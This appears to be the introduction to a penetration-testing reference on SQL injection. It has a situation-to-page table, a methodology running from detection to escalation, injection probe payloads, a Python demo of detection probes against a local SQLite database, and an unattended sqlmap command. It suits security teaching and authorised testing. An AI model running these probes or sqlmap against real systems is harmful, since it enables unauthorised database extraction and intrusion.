SQL Injection
SQL injection occurs when user input is concatenated into a SQL query instead of being passed as a bound parameter, allowing the attacker to change the query's structure rather than just a value. Impact ranges from authentication bypass to full database extraction, file read/write on the database host, and, depending on the DBMS and the privileges of the database account, remote code execution.
This section is an operational reference. Use the page that matches your situation:
| You are… | Go to |
|---|---|
| Looking for the first injection in an unknown app | Detection |
| Trying to log in without credentials | Authentication bypass |
| Seeing query output reflected in the response | UNION-based |
| Confirmed injection, need to dump the database | Enumeration |
| Output not visible, but page behaviour changes | Boolean-based blind |
| Output not visible, no behavioural difference | Time-based blind |
| No response feedback at all | Out-of-band |
| User input appears in a query, but only after later use | Second-order |
| Injecting against MongoDB / NoSQL | NoSQL injection |
| Need to read or write files via the DB | File operations |
| Payload is being filtered or blocked | Filter bypasses |
| Need syntax for a specific DBMS | DBMS cheatsheet |
Standard methodology
- Identify every parameter that may influence a query: URL parameters, form fields, headers (User-Agent, Cookie, X-Forwarded-For), JSON body fields.
- Detect by injecting a syntax-breaking character (', ", ), --) and observing for errors, behavioural change, or timing change. Confirm with a paired true/false condition (e.g. ' AND '1'='1 versus ' AND '1'='2) so that a response change caused merely by a non-matching value is not mistaken for injection.
- Fingerprint the DBMS using version-specific payloads (see DBMS cheatsheet).
- Determine the injection class: in-band (UNION/error), inferential (boolean/time blind), or out-of-band.
- Enumerate schema → tables → columns → data.
- Escalate where possible: file read/write, command execution, lateral movement.
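The detection step of the methodology above, as an added example that is not part of the original page: a constructed in-memory SQLite database (a hypothetical users table) with the same lookup written once by string concatenation and once with a bound parameter. The probe function sends the lone-quote error probe and a paired true/false boolean probe and reports which signals fire. The names make_db, lookup_vulnerable, lookup_parameterised, detect and is_injectable, and the sample rows, are assumptions of this example.

```python
import sqlite3


# Constructed sample data (not from the original page): an in-memory SQLite
# database standing in for the target application's user table.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, is_admin) VALUES (?, ?, ?)",
        [("administrator", "s3cret!", 1), ("wiener", "peter", 0)],
    )
    return conn


def lookup_vulnerable(conn, username):
    """Concatenation: the input is parsed as part of the query's structure."""
    sql = (
        "SELECT id, username, is_admin FROM users WHERE username = '"
        + username
        + "'"
    )
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, username):
    """Bound parameter: the input can only ever be a value, never syntax."""
    sql = "SELECT id, username, is_admin FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def detect(conn, lookup, base="wiener"):
    """Run the detection step against one lookup function.

    Returns a dict with two signals:
      error   - a lone quote broke the query (the input reached the SQL parser)
      boolean - two payloads that differ only in a true/false condition produced
                different result sets (the condition was evaluated by the DB)
    Timing probes are omitted because SQLite has no SLEEP()/pg_sleep() equivalent.
    """
    findings = {}

    # Error probe: with concatenation the trailing quote leaves the string
    # literal unterminated; with a bound parameter it is just another character.
    try:
        lookup(conn, base + "'")
        findings["error"] = False
    except sqlite3.DatabaseError:
        findings["error"] = True

    # Paired boolean probes: appending anything to the username changes the
    # response on BOTH versions (the value no longer matches), so compare a
    # TRUE condition against a FALSE one with the same prefix instead.
    true_rows = lookup(conn, base + "' AND '1'='1")
    false_rows = lookup(conn, base + "' AND '1'='2")
    findings["boolean"] = true_rows != false_rows
    return findings


def is_injectable(conn, lookup):
    """True if either detection signal fires for this lookup function."""
    f = detect(conn, lookup)
    return f["error"] or f["boolean"]


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", detect(db, lookup_vulnerable))    # both signals fire
    print("parameterised:", detect(db, lookup_parameterised))  # neither does
```

Both signals fire for the concatenated query and neither for the parameterised one. The paired boolean probe is the important part: a single "did the response change" check after appending a quote flags both versions, because the altered username simply matches no row. Timing probes are left out since SQLite has no sleep function; on a real target substitute SLEEP(), pg_sleep() or WAITFOR DELAY according to the DBMS cheatsheet.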
Conventions used in this section
Placeholders follow the same scheme everywhere:
- <TARGET> - target host or URL
- <PARAM> - vulnerable parameter name
- <TABLE>, <COL>, <DB> - table, column, database name
- <USER> - target username (e.g. administrator)
- <N> - column count
- <ATTACKER> - your listener / collaborator host
When a page shows a payload, assume it is what gets injected into <PARAM> - URL-encoding, prefix, and suffix depend on context.
When to reach for sqlmap
Manual exploitation is faster for simple cases and essential for understanding what's happening. sqlmap is the right tool when:
- You need to enumerate a large schema quickly.
- You’re chasing blind SQLi with hundreds of characters to extract.
- The target needs unusual handling (cookies, custom headers, JSON, multipart).
Minimal invocation (--batch accepts sqlmap's default answer to every prompt, so it runs unattended):

```sh
sqlmap -u "https://<TARGET>/path?<PARAM>=test" --batch --dbs
```

For complex requests, save the raw request from Burp to a file and use -r request.txt; sqlmap replays the saved method, headers, cookies and body, so they do not need to be re-specified on the command line. See DBMS cheatsheet for --dbms, --technique, and other flags worth knowing.